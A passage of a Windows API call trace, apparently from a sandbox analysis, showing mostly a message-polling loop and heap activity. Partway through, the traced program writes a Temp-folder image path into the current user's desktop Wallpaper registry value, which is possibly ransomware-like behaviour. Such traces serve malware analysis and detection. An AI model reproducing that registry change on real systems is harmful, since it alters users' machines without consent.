wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.287] Sleep (dwMilliseconds=0xa) [0281.300] timeGetTime () returned 0x4669d [0281.300] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.300] Sleep (dwMilliseconds=0xa) [0281.316] timeGetTime () returned 0x466ad [0281.316] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.316] Sleep (dwMilliseconds=0xa) [0281.331] timeGetTime () returned 0x466bd [0281.331] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.331] Sleep (dwMilliseconds=0xa) [0281.349] timeGetTime () returned 0x466cc [0281.349] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.349] Sleep (dwMilliseconds=0xa) [0281.393] timeGetTime () returned 0x466fb [0281.393] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.393] Sleep (dwMilliseconds=0xa) [0281.442] timeGetTime () returned 0x4672a [0281.442] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.442] Sleep (dwMilliseconds=0xa) [0281.487] timeGetTime () returned 0x46759 [0281.487] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.487] Sleep (dwMilliseconds=0xa) [0281.523] timeGetTime () returned 0x46778 [0281.523] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.523] Sleep (dwMilliseconds=0xa) [0281.565] timeGetTime () returned 0x467a7 [0281.565] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.565] Sleep (dwMilliseconds=0xa) [0281.612] timeGetTime () returned 0x467d5 [0281.612] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.612] Sleep (dwMilliseconds=0xa) [0281.648] timeGetTime () returned 0x467f5 [0281.648] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.648] Sleep (dwMilliseconds=0xa) [0281.658] timeGetTime () returned 0x46804 [0281.659] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.659] Sleep (dwMilliseconds=0xa) [0281.674] timeGetTime () returned 0x46814 [0281.674] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.674] Sleep (dwMilliseconds=0xa) [0281.689] timeGetTime () returned 0x46823 [0281.690] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.690] Sleep (dwMilliseconds=0xa) [0281.705] timeGetTime () returned 0x46833 [0281.705] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.705] Sleep (dwMilliseconds=0xa) [0281.721] timeGetTime () returned 0x46843 [0281.721] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.721] Sleep (dwMilliseconds=0xa) [0281.736] timeGetTime () returned 0x46852 [0281.736] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.736] Sleep (dwMilliseconds=0xa) [0281.752] timeGetTime () returned 0x46862 [0281.752] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.752] Sleep (dwMilliseconds=0xa) [0281.768] timeGetTime () returned 0x46871 [0281.768] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.768] Sleep (dwMilliseconds=0xa) [0281.784] timeGetTime () returned 0x46881 [0281.784] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.785] Sleep (dwMilliseconds=0xa) [0281.810] timeGetTime () returned 0x46891 [0281.810] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.810] Sleep (dwMilliseconds=0xa) [0281.815] timeGetTime () returned 0x468a0 [0281.815] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.815] Sleep (dwMilliseconds=0xa) [0281.830] timeGetTime () returned 0x468b0 [0281.830] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.830] Sleep (dwMilliseconds=0xa) [0281.846] timeGetTime () returned 0x468bf [0281.846] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.846] Sleep (dwMilliseconds=0xa) [0281.862] timeGetTime () returned 0x468cf [0281.862] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.862] Sleep (dwMilliseconds=0xa) [0281.883] timeGetTime () returned 0x468df [0281.883] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.883] Sleep (dwMilliseconds=0xa) [0281.937] timeGetTime () returned 0x4690d [0281.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0281.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0281.937] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0281.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0281.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0281.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0281.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0281.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0281.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0281.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0281.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0281.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0281.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0281.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0281.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0281.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0281.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0281.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0281.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0281.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0281.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0281.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0281.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0281.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0281.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0281.940] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0281.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0281.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0281.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa820 [0281.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0281.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0281.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa880 [0281.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0281.940] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0281.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0281.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0281.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0281.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0281.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0281.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0281.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0281.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0281.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0281.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0281.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0281.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0281.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0281.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0281.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0281.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0281.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0281.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0281.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0281.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0281.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0281.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0281.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0281.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0281.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0281.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0281.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0281.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0281.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0281.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0281.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0281.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b35e0 [0281.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0281.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0281.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0281.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0281.942] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0281.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0281.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0281.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0281.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0281.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0281.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0281.943] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8bf858, lpdwDisposition=0x8bf874 | out: phkResult=0x8bf858*=0x294, lpdwDisposition=0x8bf874*=0x2) returned 0x0 [0281.943] RegSetValueExW (in: hKey=0x294, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg", cbData=0x58 | out: lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0281.943] RegCloseKey (hKey=0x294) returned 0x0 [0281.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0281.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0281.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0281.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0281.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0281.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0281.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0281.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0281.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0281.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0281.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0281.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0281.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0281.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0281.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0281.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0281.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0281.946] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 1 [0281.946] TranslateMessage (lpMsg=0x8bf970) returned 0 [0281.946] DispatchMessageW (lpMsg=0x8bf970) returned 0x0 [0281.946] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0281.946] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0281.946] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0281.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0281.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0281.946] CharUpperBuffW (in: lpsz="A4200F01243", cchLength=0xb | out: lpsz="A4200F01243") returned 0xb [0281.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0281.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0281.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0281.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1768 [0281.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0281.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0281.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0281.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0281.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0281.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0281.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0281.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0281.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0281.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0281.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0281.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0281.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0281.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0281.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0281.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0281.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa598 [0281.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0281.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0281.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0281.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0281.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0281.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0281.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0281.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0281.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0281.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0281.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0281.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0281.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0281.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8c8 [0281.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaa8 [0281.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0281.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0281.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0281.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0281.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0281.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0281.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0281.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0281.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0281.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0281.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0281.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0281.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaa8 [0281.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8c8 [0281.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0281.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0281.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0281.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0281.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0281.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0281.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0281.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0281.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0281.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0281.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0281.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0281.950] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0281.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0281.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0281.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0281.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0281.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0281.950] RtlAllocateHeap (HeapHandle=0x25c0000, 